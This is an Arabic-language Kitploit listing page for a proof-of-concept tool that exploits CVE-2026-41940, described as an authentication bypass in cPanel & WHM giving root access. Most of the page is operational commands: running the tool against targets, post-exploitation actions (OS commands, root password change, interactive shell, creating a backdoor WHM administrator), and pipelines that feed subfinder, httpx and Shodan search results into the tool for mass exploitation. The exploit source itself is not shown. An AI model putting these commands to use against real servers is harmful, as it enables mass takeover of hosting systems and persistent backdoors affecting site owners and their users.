Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-41940-PoC — يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel & WHM، للحصول على وصول root إلى WHM وتنفيذ أوامر ما بعد الاستغلال، وقراءة الملفات، وإدارة الحسابات. | Kitploit
أدوات/GitHubGitHub/hitechcloud-vietnam/cve-2026-41940-poc
تصعيد الامتيازاتالاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالمصادقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الفريق الأحمر
أداة الوصول عن بعد
GitHubhitechcloud-vietnam/cve-2026-41940-poc

cve-2026-41940-PoC

يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel & WHM، للحصول على وصول root إلى WHM وتنفيذ أوامر ما بعد الاستغلال، وقراءة الملفات، وإدارة الحسابات.

عرض المستودع
4منذ 9س 55دلم تتم المراجعة بعد

CVE-2026-41940

⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض مكافآت الثغرات فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للرقابة.

الوصف

أداة لاستغلال CVE-2026-41940، وهي ثغرة تجاوز مصادقة حرجة في cPanel & WHM (CVSS 10.0)، تتيح للمهاجمين غير المصادق عليهم الحصول على وصول WHM بمستوى root عبر حقن تسلسلات CRLF في ملفات الجلسة من جانب الخادم من خلال ترويسة Authorization — دون الحاجة إلى أي بيانات اعتماد.

كيف تعمل

يتم استغلال CVE-2026-41940، بعبارات عامة، من خلال خلل في كيفية تعامل النظام مع جلسات المصادقة في cPanel/WHM. يبدأ الهجوم عادةً بطلب عادي إلى واجهة تسجيل الدخول، حيث يقوم التطبيق بتهيئة جلسة قبل التحقق الكامل من بيانات اعتماد المستخدم. وبسبب المعالجة غير السليمة للمدخلات المتعلقة بالجلسة، يمكن لبعض هياكل المدخلات المصممة أو غير المتوقعة أن تغيّر طريقة تخزين بيانات الجلسة أو تفسيرها من قبل الخادم.

الإصدارات المتأثرة

الإصدارقابل للاستغلالمُصحّح
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

التثبيت (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/hitechcloud-vietnam/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

كيفية الاستخدام

تتوقع الأداة تحديد نطاق هدف.

وضع الهدف الواحد:

root@kitploit:~
python cve.py -u https://target1.com:2083

يمكنك أيضًا الفحص من ملف target.txt (قم بإنشائه):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

الفحص الأساسي:

الأوامر المتاحة:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # فحص هدف واحد
python cve.py info -u https://victim1.com:2083 # استرجاع معلومات النظام (الإصدار، الحمل، استخدام القرص).
python cve.py host -u https://victim1.com:2083 # استرجاع اسم المضيف للخادم الهدف.

إجراءات ما بعد الاستغلال

root@kitploit:~
# سرد جميع الحسابات على الخادم
python cve.py list -u https://target.com:2087

# أمر نظام التشغيل
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# الحصول على معلومات الخادم (اسم المضيف، القرص، مضيف MySQL)
python cve.py info -u https://target.com:2087

# تغيير كلمة مرور root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# صدفة WHM تفاعلية
python cve.py shell -u https://target.com:2087

خطوط الأنابيب

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# من قائمة النطاق
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# نتائج Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# دمج مصادر متعددة
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

وضع صدفة WHM

بعد تنفيذ ناجح، يمكنك فتح صدفة WHM تفاعلية:

root@kitploit:~
python cve.py shell -u

جميع أوامر الصدفة


مرجع CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

إخلاء المسؤولية

⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض مكافآت الثغرات فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للرقابة.

تنزيل الأداة
الأمرالوصف
idعرض معرّف المستخدم
hostnameالحصول على اسم مضيف الخادم
accountsسرد جميع حسابات المستخدمين
infoالحمل، القرص، مضيف MySQL، الإصدار
cat <path>قراءة محتوى ملف
exec <cmd>تنفيذ أمر نظام التشغيل
newadmin <user> <pass>إنشاء مسؤول WHM خلفي
passwd <pass>تغيير كلمة مرور root
l [path]سرد محتويات الدليل
helpعرض جميع الأوامر
exitالخروج من وضع الصدفة